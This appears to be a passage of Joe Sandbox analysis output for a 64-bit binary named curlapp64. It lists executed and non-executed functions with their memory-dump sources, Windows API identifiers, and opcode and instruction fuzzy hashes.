                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: f8903f54cb2d0fbb3a88a513d88418b95db85bf5a2bab48c430c50da01420267
                                                                                                                                • Instruction ID: e2cba0321469d452ed1083c0f6884681ac8e138edd17e20a4367c1dc79f5769c
                                                                                                                                • Opcode Fuzzy Hash: f8903f54cb2d0fbb3a88a513d88418b95db85bf5a2bab48c430c50da01420267
                                                                                                                                • Instruction Fuzzy Hash: D921B072A18AC186EB618F19F4D037976B0EB85B55F185234E7AD877D9DF3CD8018B00
                                                                                                                                Function 00007FF8A9308230 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: socket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 98920635-0
                                                                                                                                • Opcode ID: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                • Instruction ID: 3e915b49437f30cd952ec2f732ebbd8982e1a02b7aea4ebb5492e218764a0ec8
                                                                                                                                • Opcode Fuzzy Hash: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                                                                                • Instruction Fuzzy Hash: 37119032B0AE8192D7548F66E084269B3B5FB48BE4F089634DBAD47B84CF3CE491C700
                                                                                                                                Function 00007FF8A9308110 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: closesocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                • Opcode ID: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                • Instruction ID: 322933eb93f9e6957cb46b572a1585a6530e1ecadf6a92ba14b740cc5ecc585b
                                                                                                                                • Opcode Fuzzy Hash: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                                                                                • Instruction Fuzzy Hash: A101D611B1DA9152EA189F56A40426A5270EF48BE0F0C6734EE2E8BBC9CE2CD4914700
                                                                                                                                Function 00007FF8A93148E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _beginthreadex
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3014514943-0
                                                                                                                                • Opcode ID: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                • Instruction ID: 5b46e167688296ff42ab50d5bc6b633797a2e5bfabf7001c3f5f6f489072e674
                                                                                                                                • Opcode Fuzzy Hash: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                                                                                • Instruction Fuzzy Hash: 35E08C62B1AA8082AE244F666841026E2A1AB487B0A5C47389E7C863E0DB3CA2914810
                                                                                                                                Function 00007FF6CABF60DC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __vcrt_uninitialize_ptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1180542099-0
                                                                                                                                • Opcode ID: 8bdc3493c57d326d10743a22c5efe28bfaae284d337f35702c7339504161e960
                                                                                                                                • Instruction ID: 116c8f6dda9c4a1a06b1ef8cbc352908c846879018ce5c6dfd7487a86499a503
                                                                                                                                • Opcode Fuzzy Hash: 8bdc3493c57d326d10743a22c5efe28bfaae284d337f35702c7339504161e960
                                                                                                                                • Instruction Fuzzy Hash: 4FE0E56CD0E28350ED54AF743D320B816942F67316F582AFDD9EEC22D39E1C62556215
                                                                                                                                Function 00007FF6CABE4288 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6CABE429C
                                                                                                                                  • Part of subcall function 00007FF6CABE5E80: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6CABE5E88
                                                                                                                                  • Part of subcall function 00007FF6CABE5E80: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6CABE5E8D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1208906642-0
                                                                                                                                • Opcode ID: cc4600dbc0be7681400d59c1cfd8b886fbfdb3416440da6dc4029802db45df17
                                                                                                                                • Instruction ID: c557967fbf9ca543b9cac20224155fb5b5d68305febb72cee485fb66e022f6a3
                                                                                                                                • Opcode Fuzzy Hash: cc4600dbc0be7681400d59c1cfd8b886fbfdb3416440da6dc4029802db45df17
                                                                                                                                • Instruction Fuzzy Hash: 8CE0B629D2C24385FE982E6136722F947801F6330BF5405F8D8CDC65838D4F704A21A1
                                                                                                                                Function 00007FF8A9318E40 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • AcquireSRWLockExclusive.KERNEL32 ref: 00007FF8A9318E4B
                                                                                                                                  • Part of subcall function 00007FF8A934FDE0: FreeLibrary.KERNEL32(?,?,?,00007FF8A9318E7B), ref: 00007FF8A934FDF4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AcquireExclusiveFreeLibraryLock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 925248277-0
                                                                                                                                • Opcode ID: cc9ee07f75f5eb5ef911d757bfaaaba6d461f08265da5f81e9781ee851d7004a
                                                                                                                                • Instruction ID: 43f2734dbffd0a0ec7a39b54dd32515ce6e034a4930d15d66ca619498dae6943
                                                                                                                                • Opcode Fuzzy Hash: cc9ee07f75f5eb5ef911d757bfaaaba6d461f08265da5f81e9781ee851d7004a
                                                                                                                                • Instruction Fuzzy Hash: 48F0F220D0ECC3BAF600AF18AC452B562F0EF013D4F25A134D11EC51E1EE2DA842CB21
                                                                                                                                Function 00007FF6CABF8410 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 274343b1df128302e0ad9f61dfa13d56a919f165eb85e91df2f31c8fbe074bb0
                                                                                                                                • Instruction ID: e8c62880a4084974d16533c7b944bb968eb752b011538d6d42bfbe14144647cb
                                                                                                                                • Opcode Fuzzy Hash: 274343b1df128302e0ad9f61dfa13d56a919f165eb85e91df2f31c8fbe074bb0
                                                                                                                                • Instruction Fuzzy Hash: C7D0C925B3A54187E3409F52E895BA66338B798702FD01065EA8AC16948F7CC299CB10
                                                                                                                                Function 00007FF8A933C2D0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ioctlsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3577187118-0
                                                                                                                                • Opcode ID: 6a6e5c2baaee02c14a4862300e1e534eccd1fb5847dbe05d4c8c646c8366030d
                                                                                                                                • Instruction ID: 1347a6321e7e83f3fef30bdf5148282efb68f9c2895bf8a4574ce53211ea1b46
                                                                                                                                • Opcode Fuzzy Hash: 6a6e5c2baaee02c14a4862300e1e534eccd1fb5847dbe05d4c8c646c8366030d
                                                                                                                                • Instruction Fuzzy Hash: F0C08056F199C1C2C3445F61588508BA7B1FBC4344F956435D20781134DD3CC2A58F40
                                                                                                                                Function 00007FF8A9314810 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                • Opcode ID: 8fb0cf93fba7cfb2a4f20eac4153e253e84e23997175e6890aa831645548a656
                                                                                                                                • Instruction ID: 912d4363528b3136e682fcb60c4c26e8a5cb1f7b5decc95f7d2f489418c69064
                                                                                                                                • Opcode Fuzzy Hash: 8fb0cf93fba7cfb2a4f20eac4153e253e84e23997175e6890aa831645548a656
                                                                                                                                • Instruction Fuzzy Hash: 22D0C920E0FE83A4EA549F55AC8913523F4EF49784F916434C14EC1320EE2CA862C700
                                                                                                                                Function 00007FF8A933FEC0 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                • Opcode ID: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                                                                                • Instruction ID: 6724a85b569f776e3746b98b9c7ae0b394fd1d1035e8884d5e7b542895f00df3
                                                                                                                                • Opcode Fuzzy Hash: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                                                                                • Instruction Fuzzy Hash: A6D0C292B2898101DB2859B3B68746B90529B59FC0F08E034AE0ACB68ADC2CC1810700

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FF6CABC2200 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 350COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: parse_error$value
                                                                                                                                • API String ID: 1944019136-1739288027
                                                                                                                                • Opcode ID: a97c2df0324839ba9a23300c13ebf249e40d394a4e318e75e849f07ff394ede0
                                                                                                                                • Instruction ID: 875cbf61cca8292a748312e9ea52517808f220c9a72cf0858ec84f79cdeb1fa7
                                                                                                                                • Opcode Fuzzy Hash: a97c2df0324839ba9a23300c13ebf249e40d394a4e318e75e849f07ff394ede0
                                                                                                                                • Instruction Fuzzy Hash: A3E10822F18A4655EB00DF74F8612FD2361EF56399F4053B2EA9D97AAADE38E144C340
                                                                                                                                Function 00007FF8BA24E24C Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 313767242-0
                                                                                                                                • Opcode ID: f881db69f7aac02742724b58b026e68039e3f4162e1a059bda2682f6cfa32fcf
                                                                                                                                • Instruction ID: 3bf94c24fbbf78d1c4fb8a84b497fbc977654dcb7a5e6a56fd6423b426c09c7d
                                                                                                                                • Opcode Fuzzy Hash: f881db69f7aac02742724b58b026e68039e3f4162e1a059bda2682f6cfa32fcf
                                                                                                                                • Instruction Fuzzy Hash: 43312C72608B8286EB60DF64E8403ED77A0FB84B84F44447ADB4E47B99DF38D648D710
                                                                                                                                Function 00007FF6CAC005E8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                                                                                                                                • String ID: utf8
                                                                                                                                • API String ID: 2487361160-905460609
                                                                                                                                • Opcode ID: 34cccc52e21ccf182b2682d1341dbb0482f96e1963a4f2efc55d2886cd143326
                                                                                                                                • Instruction ID: bd27a25138b8388d3162dc0dc55bd79fb68b215cb17541b698b2d0c33649eed0
                                                                                                                                • Opcode Fuzzy Hash: 34cccc52e21ccf182b2682d1341dbb0482f96e1963a4f2efc55d2886cd143326
                                                                                                                                • Instruction Fuzzy Hash: FD91B0BAA0878285EB209F21F4602BA27B4BF44B86F4541B5DF8C83786DF3CE545C740
                                                                                                                                Function 00007FF6CABE491C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                • Opcode ID: 7af368e7026b6201f9f4e8030217bcf5bf43ab111fe782fafec2d5b40c989550
                                                                                                                                • Instruction ID: 7d8f4276de4f855811ba38e88282e199fd5049aae97de361e30741b2ef021ed2
                                                                                                                                • Opcode Fuzzy Hash: 7af368e7026b6201f9f4e8030217bcf5bf43ab111fe782fafec2d5b40c989550
                                                                                                                                • Instruction Fuzzy Hash: DE311E76608B818AEB608FA0E8543EA7374FB95745F44407ADB8D87B99DF3CD548C710
                                                                                                                                Function 00007FF6CAC01048 Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3082464267-0
                                                                                                                                • Opcode ID: eb1cdc4e41f491258aa06c65caae35cfc640384752c5aa504665f3f7de12368f
                                                                                                                                • Instruction ID: 0cff2e65d919a8135eeb64c56981e9879762e9f9b4c65e4a995ab4a7ec87cd31
                                                                                                                                • Opcode Fuzzy Hash: eb1cdc4e41f491258aa06c65caae35cfc640384752c5aa504665f3f7de12368f
                                                                                                                                • Instruction Fuzzy Hash: 307179A2F186828AFB149F61E8606B873B0BF44B86F4441B5CB8E93795EF3CE445C350
                                                                                                                                Function 00007FF6CABF158C Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                • Opcode ID: 81ea5553921764c7ffe6b693d444253d0fad13827777ee08f1dfa98647d140be
                                                                                                                                • Instruction ID: 2ae7db7c2da32478c8fef611daccac8fa58c9c14146a865efcc3de839ae2b007
                                                                                                                                • Opcode Fuzzy Hash: 81ea5553921764c7ffe6b693d444253d0fad13827777ee08f1dfa98647d140be
